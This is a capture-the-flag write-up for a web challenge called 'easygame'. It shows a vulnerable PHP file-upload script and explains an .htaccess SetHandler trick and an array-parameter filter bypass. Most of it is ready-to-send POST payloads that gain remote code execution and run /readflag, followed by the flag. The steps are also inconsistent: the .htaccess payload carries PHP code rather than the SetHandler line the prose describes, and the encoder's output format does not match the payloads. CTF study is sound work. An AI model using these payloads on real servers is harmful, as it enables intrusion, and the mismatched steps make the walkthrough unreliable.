pcat/7/easygame
Name: easygame
Type: web
Author: kagi
Desc: bypass me
Link: http://139.9.251.90:8888/
Attach: None
Tips: None
Total: 125 First: 佚名 Second: Ricky Third: lu0sf
Writeup
<?php
highlight_file(__FILE__);
#### easy game
$upload = 'upload/'.md5("2021".$_SERVER['REMOTE_ADDR']);
@mkdir($upload);
file_put_contents($upload.'/index.php', '');
var_dump($upload);
if (isset($_POST['file']) && isset($_POST['file'])){
if(preg_match('#.+\.ph(p[3457]?|t|tml)$|/#is',$_POST['file'])){
die('file error');
}
if(preg_match('#\w{2,}|[678]|<\?|/#',$_POST['content'])){
die('content error');
}
file_put_contents($upload.'/'.$_POST['file'], $_POST['content']);
}
if (isset($_GET['reset'])){
@rmdir($upload);
} string(39) "upload/c946d761bddc7564ff3e45a77a54ae13"
We have access to the upload folder, but both the filename and the content are filtered. The question is to bypass the filter.
Bypass filename
The filename can't be uploaded using any kind of .php
format. The only way is to upload a .htaccess
file to identify the files in this folder are all executed using php
.
.htaccess
SetHandler application/x-httpd-php
After that, we can upload any filename and open it, the file would be resolved using php
.
But how can we upload the content in the .htaccess
? Let's discuss below.
Bypass content
The filter is strict, all 2 length printable characters are not valid. However, we can use an array to bypass this filter.
def gen_content(inp):
i = 1
for c in inp:
print('content['+str(i)+']=%'+hex(ord(c))[2:]+'&', end='')
i += 1
Then we can upload any php
script to server and gain RCE.
How to find the flag? After several searching in the server, we discovered a /readflag
ELF to read the flag file. Execute it to get the flag.
Payload
.htaccess
file upload:
file=.htaccess&content[1]=<&content[2]=?&content[3]=p&content[4]=h&content[5]=p&content[6]=%0a&content[7]=e&content[8]=x&content[9]=e&content[10]=c&content[11]=(&content[12]="&content[13]=l&content[14]=s&content[15]="&content[16]=)&content[17]=%0a&content[18]=?&content[19]=>
payload
file upload:
file=payload&content[1]=<&content[2]=?&content[3]=p&content[4]=h&content[5]=p&content[6]=%0a&content[7]=e&content[8]=c&content[9]=h&content[10]=o&content[11]=%20&content[12]=e&content[13]=x&content[14]=e&content[15]=c&content[16]=(&content[17]="&content[18]=/&content[19]=r&content[20]=e&content[21]=a&content[22]=d&content[23]=f&content[24]=l&content[25]=a&content[26]=g&content[27]="&content[28]=)&content[29]=%0a&content[30]=?&content[31]=>
Flag
flag{46dd5c50-3e80-485e-80f4-f46b5d85f4b8}